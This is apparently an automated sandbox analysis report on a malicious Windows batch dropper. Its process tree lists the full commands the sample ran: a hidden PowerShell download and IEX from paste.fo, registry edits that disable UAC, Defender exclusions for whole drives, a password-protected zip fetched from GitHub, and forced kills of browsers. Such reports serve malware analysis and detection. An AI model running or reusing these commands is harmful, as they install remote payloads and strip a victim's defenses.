b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
31-12-2024 02:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat
Size

41KB
MD5

b84568e632497dd5dc2f4ac9f08b783c
SHA1

a0a8e9493a356a2c495130da52c5b49c3d82685a
SHA256

b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d
SHA512

e8dfb9a8ee9ffdcad0899e2c07d56883bb25d160cf3c84fff1dec079b5cd4a02e00b380c557df5b835b72336b81ac31118eac19f8e5be3f52e402d48f6038ca3
SSDEEP

96:T/63GJPQPb8TddwNuwfENeToq+u8+lddLdpCd9dTddxNEbb8mJPQP8u8+vdpCd9G:rwxGqFdMndL3fvPAFrBhwHON0

Score

10^/10

defense_evasion discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://paste.fo/raw/cdfd23f3b9ad

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2816	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2816	powershell.exe
1596	powershell.exe
2704	powershell.exe
2756	powershell.exe
1496	powershell.exe
1712	powershell.exe
1076	powershell.exe
2604	powershell.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

Possible Turn off User Account Control's privilege elevation for standard users.

defense_evasion persistence privilege_escalation

Executable Installer File Permissions Weakness

T1574.005

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
15	raw.githubusercontent.com
7	raw.githubusercontent.com
9	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2200	timeout.exe
3020	timeout.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
2476	taskkill.exe
532	taskkill.exe
284	taskkill.exe
1408	taskkill.exe
2176	taskkill.exe
664	taskkill.exe
556	taskkill.exe
972	taskkill.exe
2140	taskkill.exe
2056	taskkill.exe
2996	taskkill.exe
1912	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 26 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B58D28B1-C721-11EF-8318-F2DF7204BD4F} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe

Modifies registry key 1 TTPs 12 IoCs

Modify Registry

T1112

pid	Process
2656	reg.exe
1844	reg.exe
2052	reg.exe
660	reg.exe
2964	reg.exe
2956	reg.exe
2788	reg.exe
2900	reg.exe
1880	reg.exe
468	reg.exe
1264	reg.exe
2940	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2816	powershell.exe
2604	powershell.exe
2604	powershell.exe
2604	powershell.exe
2756	powershell.exe
1496	powershell.exe
1712	powershell.exe
1076	powershell.exe
1596	powershell.exe
2704	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeRestorePrivilege	708	7z.exe
Token: 35	708	7z.exe
Token: SeSecurityPrivilege	708	7z.exe
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	556	taskkill.exe
Token: SeDebugPrivilege	532	taskkill.exe
Token: SeDebugPrivilege	284	taskkill.exe
Token: SeDebugPrivilege	972	taskkill.exe
Token: SeDebugPrivilege	2140	taskkill.exe
Token: SeDebugPrivilege	2056	taskkill.exe
Token: SeDebugPrivilege	1408	taskkill.exe
Token: SeDebugPrivilege	2996	taskkill.exe
Token: SeDebugPrivilege	2176	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
640	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
640	iexplore.exe
640	iexplore.exe
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 2688	2984	cmd.exe	31
PID 2984 wrote to memory of 2688	2984	cmd.exe	31
PID 2984 wrote to memory of 2688	2984	cmd.exe	31
PID 2688 wrote to memory of 2816	2688	cmd.exe	33
PID 2688 wrote to memory of 2816	2688	cmd.exe	33
PID 2688 wrote to memory of 2816	2688	cmd.exe	33
PID 2688 wrote to memory of 2604	2688	cmd.exe	34
PID 2688 wrote to memory of 2604	2688	cmd.exe	34
PID 2688 wrote to memory of 2604	2688	cmd.exe	34
PID 2604 wrote to memory of 2576	2604	powershell.exe	35
PID 2604 wrote to memory of 2576	2604	powershell.exe	35
PID 2604 wrote to memory of 2576	2604	powershell.exe	35
PID 2576 wrote to memory of 2656	2576	cmd.exe	37
PID 2576 wrote to memory of 2656	2576	cmd.exe	37
PID 2576 wrote to memory of 2656	2576	cmd.exe	37
PID 2688 wrote to memory of 640	2688	cmd.exe	38
PID 2688 wrote to memory of 640	2688	cmd.exe	38
PID 2688 wrote to memory of 640	2688	cmd.exe	38
PID 2576 wrote to memory of 1844	2576	cmd.exe	39
PID 2576 wrote to memory of 1844	2576	cmd.exe	39
PID 2576 wrote to memory of 1844	2576	cmd.exe	39
PID 2688 wrote to memory of 2200	2688	cmd.exe	40
PID 2688 wrote to memory of 2200	2688	cmd.exe	40
PID 2688 wrote to memory of 2200	2688	cmd.exe	40
PID 2576 wrote to memory of 2052	2576	cmd.exe	41
PID 2576 wrote to memory of 2052	2576	cmd.exe	41
PID 2576 wrote to memory of 2052	2576	cmd.exe	41
PID 2576 wrote to memory of 1264	2576	cmd.exe	42
PID 2576 wrote to memory of 1264	2576	cmd.exe	42
PID 2576 wrote to memory of 1264	2576	cmd.exe	42
PID 2576 wrote to memory of 660	2576	cmd.exe	43
PID 2576 wrote to memory of 660	2576	cmd.exe	43
PID 2576 wrote to memory of 660	2576	cmd.exe	43
PID 2576 wrote to memory of 2964	2576	cmd.exe	44
PID 2576 wrote to memory of 2964	2576	cmd.exe	44
PID 2576 wrote to memory of 2964	2576	cmd.exe	44
PID 2576 wrote to memory of 2956	2576	cmd.exe	45
PID 2576 wrote to memory of 2956	2576	cmd.exe	45
PID 2576 wrote to memory of 2956	2576	cmd.exe	45
PID 640 wrote to memory of 2648	640	iexplore.exe	46
PID 640 wrote to memory of 2648	640	iexplore.exe	46
PID 640 wrote to memory of 2648	640	iexplore.exe	46
PID 640 wrote to memory of 2648	640	iexplore.exe	46
PID 2576 wrote to memory of 2788	2576	cmd.exe	47
PID 2576 wrote to memory of 2788	2576	cmd.exe	47
PID 2576 wrote to memory of 2788	2576	cmd.exe	47
PID 2576 wrote to memory of 2900	2576	cmd.exe	48
PID 2576 wrote to memory of 2900	2576	cmd.exe	48
PID 2576 wrote to memory of 2900	2576	cmd.exe	48
PID 2576 wrote to memory of 2940	2576	cmd.exe	49
PID 2576 wrote to memory of 2940	2576	cmd.exe	49
PID 2576 wrote to memory of 2940	2576	cmd.exe	49
PID 2576 wrote to memory of 1880	2576	cmd.exe	50
PID 2576 wrote to memory of 1880	2576	cmd.exe	50
PID 2576 wrote to memory of 1880	2576	cmd.exe	50
PID 2576 wrote to memory of 468	2576	cmd.exe	51
PID 2576 wrote to memory of 468	2576	cmd.exe	51
PID 2576 wrote to memory of 468	2576	cmd.exe	51
PID 2576 wrote to memory of 2756	2576	cmd.exe	52
PID 2576 wrote to memory of 2756	2576	cmd.exe	52
PID 2576 wrote to memory of 2756	2576	cmd.exe	52
PID 2576 wrote to memory of 1496	2576	cmd.exe	53
PID 2576 wrote to memory of 1496	2576	cmd.exe	53
PID 2576 wrote to memory of 1496	2576	cmd.exe	53

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat'))"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2576
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2656
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
        5⤵
        Hijack Execution Flow: Executable Installer File Permissions Weakness
        Modifies registry key
        
        PID:1844
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2052
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1264
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:660
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2964
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2956
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2788
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2900
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2940
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:1880
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1496
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1076
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:640
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:640 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2648
- - C:\Windows\system32\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:2200
- - C:\Program Files\7-Zip\7z.exe
    "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOCX.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:708
- - C:\Windows\system32\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:3020
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:664
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2476
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1912
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:556
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:532
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM safari.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:284
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM brave.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:972
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM vivaldi.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2140
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM epic.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2056
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM yandex.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1408
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM tor.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2996
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM CMD.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ef5bc40e283e98adffb00ead170ce47f

SHA1
d83037bf7f6f90cff802abd56b2ed6eeaacac5dc

SHA256
2cf06be27560726c8a50b7e6518111acf00c43cff1ab029a79cc2144f992d4cb

SHA512
cdfe342e55bde2f11990796cbc59e038c461784d1feef57eab211f8322237c28661c2d378df0bf4b81cc2fec6c579343eb7318ce2b785acb2d34625a04b866f5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
fbb8b52a1867e553bba77f3ba45ae0e4

SHA1
094abfa4719ed126cf18ac220c1f224e2d75e2d8

SHA256
ad431b95b48b102059a90787d4dbca3e011475f9e66b4e56e6003da8f6d8d9f3

SHA512
dca1e1636d88cbddaf326809ace223a96aeb5e5903a78bc20136c94a163b8a8f228984457b1c731fcaca606dc7189d037bf764b26d5718c88752463b467ae9e1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e8a9b4147ee4a168efc5b04b2097542b

SHA1
88d3899316f42b1db1b784e04c3e39181cadcd76

SHA256
c6f56e718269d7bbb1110a185bee987e02cd0300e9007f1917c15cc1a72cd6c7

SHA512
9da5f0867f20e54a61e4c76b019408ff5b213adafb5d9155e0e41520bbc1bbd29c29ced1c8b3691b0e1d94d2c77eeef869285ca2a60a6d80e0359101d13c4408

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
646fe3754ff93eadae0c8dd9a2e87ea5

SHA1
f99348f0b513e7751e4a7ab908973f96f6dd078c

SHA256
986959770fc3254cbd8ce198f8e9fed606e67dab19ad65ad7d717c35239de20d

SHA512
40afbff6391f716c9009fc2235b477035ffc354ca68ec16ef40c4b5fcab70b98c190374a10f65fcf121a476262190aab7632c513f690fd021898939f77718b81

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
84506270217f846e3690a4a219c7196f

SHA1
ff35ea9eedadfce59c8531b15f1b794a67dadbf7

SHA256
af296b754a8f123e872639e51d060738a2e1008a5bf3d0f3f864acdbe929df42

SHA512
e6c7b8966107be1d1c4afb0abc48a2b9b443b79becec0f1043f4a4e10197e839968ae58d1bb69e9da9e6bf2d250faf571cd9109ed6bc90076dc298b792a30fd8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3178aa479de48cf99eab7a83686b6413

SHA1
3db4c339795d49e0b335ca299c5fd8ec6dd0fe57

SHA256
b119000ef1ee8d1843299ff6d966b83ab178f31ad50ccb27d7170f884c165c5e

SHA512
e27e43e3ebce4dfabf585c99c94a0cab1f0497393b18d80af1972f20df831f8accb4f064d825334bfb959bc2e529c90588810b92f6e50cea4400b18a0a712ca9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
983ecc3a9a612b3612d932bdad8b1f87

SHA1
4a2bc6f71f0b44711e1719a98bcb20402ccb935f

SHA256
febc196682b88c6070f4169a9230ebd9fcd1a203a75d19410df2b657434ee393

SHA512
5a75cf339b4f35d1b80246104cd4c802828642bf9c8dadaf99f8984dee4894ee7d75e901de9becd9de7af958a51fe26a04bb2d406fcda78ca9f5697c0edb0b1a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
97dc44b1c0db21d611266649a406dfcf

SHA1
d9380a64edc937357226886163f4d767570ca5da

SHA256
d354a950fdf7d330e14f7e49499360bc0c875a4da317b32e5d3c0d7ba4450a8b

SHA512
c334f2300c3349e0825bd136be1f703c8c8a1891ce81a7ce32846524a9487b0db89ebd215b43b117beb835ce45a446e4749d7b405f77459a1e857b2f73a2cb6c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d8024309a43fac836bc1b8432065601d

SHA1
ebf83ce3307233bd3c6e53bb20d6bf81cf44f9ac

SHA256
12bcdcdf717b04892b4a395a3ef7517d530854c7295e86d62804cc28af62d145

SHA512
bc3a081f847ed7cbba2060a2ac1c347a188cf151179d4c3b7e0d46f28e7d17c64c3c33c1085bbaaf3f88fd01915775f6d8c81006fddafe49d6433e9e5ee2c2ed

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e6a3a596835f8f679b729c5a3841a26e

SHA1
84ab44d8afccbc6bc07154557791ff0fb357e1cc

SHA256
dd68d342a05692a5a64ef1736e02c0fc6bced52daf99fbd07f029e6a6a22f352

SHA512
ca26f56e3ecaa17ec7c86cfafc17a0af9664abf662d1c32d527bfc8450ac1949dd86d4e3cce6b605cee78f1cea4d32fac329f67d911bedcbbab9936fd6d70be9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
